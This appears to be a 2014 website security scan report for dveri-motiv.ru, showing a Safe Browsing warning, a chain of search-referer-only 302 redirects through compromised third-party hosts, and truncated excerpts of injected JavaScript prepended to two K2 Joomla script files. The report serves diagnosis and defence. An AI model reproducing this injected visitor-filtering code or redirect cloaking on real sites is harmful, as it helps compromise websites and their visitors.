Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dveri-motiv.ru
Result: Google marks this website as suspicious: visiting it may harm your computer.
Details are available here.
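Malicious/Suspicious Redirects
Each request below was sent with a search-engine Referer header, imitating a visitor who arrives from search results. The site answers that request with a 302 to a third-party host, and each hop forwards to the next until the chain ends at google.ru, while the same start URL is listed with 200 OK in the scanned-pages table further down. A redirect that appears only for some visitors usually points to injected server-side code or rewrite rules on each host in the chain, although this report does not show where the rule lives.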
Request | Server response | Status |
URL: http://dveri-motiv.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: dveri-motiv.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 25 Jun 2014 17:57:06 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 25 Jun 2014 17:57:06 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 25 Jun 2014 17:57:07 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.29 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 25 Jun 2014 17:57:08 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://dveri-motiv.ru/ | 200 OK Content-Length: 23510 Content-Type: text/html | clean |
http://dveri-motiv.ru/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/media/k2/assets/js/k2.noconflict.js | 200 OK Content-Length: 1977 Content-Type: application/javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The scanner shows only a truncated excerpt: the user-agent list is cut off mid-string, and the definition of setCookie and anything the script does beyond the cookie check are not shown. The visible part appears to filter visitors by user agent and to set a marker cookie when it is absent; it is prepended to the file's legitimate content (var $K2 = jQuery.noConflict();). Excerpt: (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!ffff_listier_ua()) { var cookie = getCookie('mintfresh19he57be10lem8nes7ze16ne8human'); if (cookie == undefined) { setCookie('mintfresh19he57be10lem8nes7ze16ne8human', true, 86403); } } })(); var $K2 = jQuery.noConflict(); Antivirus reports:
(No antivirus results are present in this copy of the report.)
http://dveri-motiv.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 8953 Content-Type: application/javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The excerpt is truncated by the scanner: it opens with the same injected prefix that is reported for k2.noconflict.js, breaks off inside the user-agent list, and resumes in what looks like the file's legitimate K2 code. Excerpt: (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire $K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length); }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); Antivirus reports:
(No antivirus results are present in this copy of the report.)
http://dveri-motiv.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/templates/rt_mixxmag_j15/js/rokutils-mt1.2.js | 200 OK Content-Length: 1814 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/templates/rt_mixxmag_j15/js/rokmodtools-mt1.2.js | 200 OK Content-Length: 7787 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/templates/rt_mixxmag_j15/js/rokmoomenu-mt1.2.js | 200 OK Content-Length: 4949 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/templates/rt_mixxmag_j15/js/mootools.bgiframe.js | 200 OK Content-Length: 990 Content-Type: application/javascript | clean |
http://scripts.mycounter.ua/counter2.0.js | 200 OK Content-Length: 3543 Content-Type: application/javascript | clean |
http://dveri-motiv.ru/mgz-dveri | 200 OK Content-Length: 20439 Content-Type: text/html | clean |
http://dveri-motiv.ru/enrn | 200 OK Content-Length: 22275 Content-Type: text/html | clean |
http://dveri-motiv.ru/map-to-the-shop | 200 OK Content-Length: 13988 Content-Type: text/html | clean |
http://dveri-motiv.ru/-milyana | 200 OK Content-Length: 22712 Content-Type: text/html | clean |
http://dveri-motiv.ru/media/zoo/libraries/jquery/jquery.js?ver=20140330 | 200 OK Content-Length: 93244 Content-Type: application/javascript | clean |